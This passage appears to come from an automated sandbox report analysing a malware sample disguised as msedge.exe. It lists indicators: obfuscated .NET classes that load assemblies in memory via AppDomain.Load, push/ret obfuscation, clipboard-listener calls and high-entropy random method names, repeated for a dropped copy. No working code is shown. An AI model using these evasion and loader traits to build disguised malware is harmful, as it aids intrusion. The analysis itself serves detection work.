Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B88239D push E95E52EFh; rep ret		0_2_00007FFD9B8823C9
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B880ED5 push ebx; iretd		0_2_00007FFD9B880EEA

Source: msedge.exe, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: msedge.exe, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: msedge.exe, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: msedge.exe, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: msedge.exe, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: msedge.exe, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: msedge.exe, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: msedge.exe, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
Source: msedge.exe, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: msedge.exe, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 'ddxZ2Rhemy7R2unOOsHOMpK8HzMvGjJ0eEikPrdXcaOZ5oyAxkfoafGFsd6f', 'KfU296howMWcLVz74PfISzC1tx9XuSZbFlPXVrT1iOBkWWCORUqwVwfNKrKccUs0cQoleOKXCIWXC', 'QeDrt88qROMXr706fEE0E1HpRIaJPj7hvIFLjVwYZFvlwOEQHm1vPX3JPJFCqtYiS4OZLIC0RJB5A', 'Ld8Rf0Ydv8y64HCHXnTLgAps4XD4i6O886QLjqWRolpqbSeh4kqkDpYc8tDsxDn4s09A9J2uF1jCZ'
Source: msedge.exe.0.dr, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: msedge.exe.0.dr, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: msedge.exe.0.dr, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: msedge.exe.0.dr, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: msedge.exe.0.dr, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: msedge.exe.0.dr, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: msedge.exe.0.dr, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: msedge.exe.0.dr, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: msedge.exe.0.dr, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
Source: msedge.exe.0.dr, MsQTzqY2sBj0FbHgvJMxkq82mfk4SRkbM1aSfDlqrPA7a6lhdbMb3mFFZ2ztQ35vqL8QsrgUEv8telYizny7ghy9Nfmg.cs	High entropy of concatenated method names: 'BgWXOWgO0RI3t5W3oSY6ihW9vTBdo1stsBmrzvCZr1Gndmi7B753o71isrC995eT9o2QMOyI9PvSG9rHwAEDKsf8dIVh', 'mLrb28lDc45nuolIayy8ybvyvpu6hLudR8Lzj0L023E83hssFfe4Ma1eNEU7UdPjaWpijvP0kHSy9S65thBPTbeqCUJA', '_09DjBKmArthWJ7592zh4Ps65ujKWx9kewlgrDUdERDPv0YRVmLCPKE64IDx1Ku9e3U0FVLibmymsZ41ZDt9f8mBg2ESA', '_4bGBp8QE8O6JRdrtfU8RPYdGpdB74XBQFj8msmLm3LOx5AvRdiiH6oll9P0BHWylLDtg0fwrvXSjqzRHLQr3fkLXDnLw', 'pzhX0VehHDbIVhtQcfO78TfuwJfdU9GXKyHaZvT26sZpvkz4iUEqJAXiNx6lq92USmuqzNEmovRwUjcVfCg10D1wveTl', 'IIn8M8Ds6cnVUlcv1QgrKruk529mzUiWsXU1TOMMVBP5KAGcmR2e2l9KagPBglolMzhyOzlIKblMEll2IVe5wt33Klux', 'MlxLc2itlvfivBLwxTRK5ByiT33RF6B6hdUZvLb7BSxkuRVtwO0aQikTl07vLaQhcbsNIFTru6AApvXMdCusrd00BaFm', 'j5PRWDxSf9VSbACJNyT4nGG2qWvLnSfB12QggYX0rn7Py0GF86ndV5LzRkt4XuzgnmqzKCAXR3BQtMg2EJA5949r0c7t', '_7RH5Ghmd423QwIyVvETSrMc1o12jYW9ra0VF3ekwSgG6Ot1CEqYbA2o9yAzoOVIknD3fJZqaHVfBMWR9rsKuaHByakzK', 'X3fS1rnQNtUb0WjigIgKDW1OspnbNSJHE03MjnOHx2BJYgzvZFVrX63C5slydfAw6xktldugc6OlQbca6vw3YX9Db0i3'
Source: msedge.exe.0.dr, FH0T0lPJxmOipHaUauBOzt38ZrPAkacMeVaEICPqgm67LoA3gyNRBYagqZIL.cs	High entropy of concatenated method names: 'hNeG1c7oW4ipUj5sVSmEsWN55cTDnWsViXhKxYAkTbIS5t2fHkEBnrOdRJkN', 'htgGBQkkZ25Vt7aTvoDA9upspcYaatPrvBn7myCTBjxxdJEIc6cQxQPytM4v', '_28rXdbRVwM8xvJIu2LcOZcIN7mghtOewZ0s8beuoMFcTgPr7rSDe2H7uEMDi', 'JnB4EaOWCVK6CmXmNEkbssXGELYRSKUn68Yb3PXR28GmLF9o3Wbg64ynhFDC', '_96WilbUmS1C4eGEe5JH7B7W3XfAvAiZjNuPdCEjIjqaon9pkGDNrw5vAM37S', 'kaod4hQ3GNleMytR5Y0Ina4LOJU3ZQbpOS2vQPoppNpww3WCpTUewvjJAu5V', 